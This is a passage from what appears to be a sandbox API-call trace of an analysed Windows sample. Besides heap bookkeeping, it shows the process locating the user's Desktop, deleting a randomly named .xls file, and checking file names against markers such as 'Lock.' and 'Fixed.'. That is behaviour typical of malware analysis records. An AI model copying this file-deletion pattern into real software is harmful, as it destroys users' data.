dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0089.955] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.955] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0089.955] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0089.955] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0089.956] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6450 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75f60 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0089.956] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0089.956] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0089.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0089.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0089.957] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a68440 [0089.957] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/BlDya8Gp-4HPz6uNsS.xls", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\BlDya8Gp-4HPz6uNsS.xls", lpFilePart=0x8cedf4*="BlDya8Gp-4HPz6uNsS.xls") returned 0x2e [0089.957] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.957] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BlDya8Gp-4HPz6uNsS.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\bldya8gp-4hpz6unss.xls")) returned 0x20 [0089.957] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\BlDya8Gp-4HPz6uNsS.xls", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 0x9a3ec0 [0089.957] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BlDya8Gp-4HPz6uNsS.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\bldya8gp-4hpz6unss.xls")) returned 1 [0089.965] FindNextFileW (in: hFindFile=0x9a3ec0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 0 [0089.986] FindClose (in: hFindFile=0x9a3ec0 | out: hFindFile=0x9a3ec0) returned 1 [0089.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75f60 | out: hHeap=0x2af0000) returned 1 [0089.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0089.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.986] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0089.986] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0089.986] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.986] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0089.987] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf438 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa65a0 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71e88 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75948 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa65a0 | out: hHeap=0x2af0000) returned 1 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.987] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.987] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0089.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0089.988] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0089.988] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x5e) returned 0x2a68440 [0089.989] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/BlDya8Gp-4HPz6uNsS.xls", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\BlDya8Gp-4HPz6uNsS.xls", lpFilePart=0x8cf650*="BlDya8Gp-4HPz6uNsS.xls") returned 0x2e [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0089.989] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\BlDya8Gp-4HPz6uNsS.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\bldya8gp-4hpz6unss.xls")) returned 0xffffffff [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75948 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.989] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.989] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0089.989] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.989] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0089.989] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0089.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0089.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0089.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0089.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0089.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0089.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.990] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0089.990] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.990] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0089.990] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0089.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0089.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0089.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0089.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0089.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0089.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.991] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71db8 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0089.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0089.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op.ini", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0089.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0089.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0089.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0089.993] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0089.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0089.993] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0089.993] HeapFree (in: hHeap=0x2af0000, 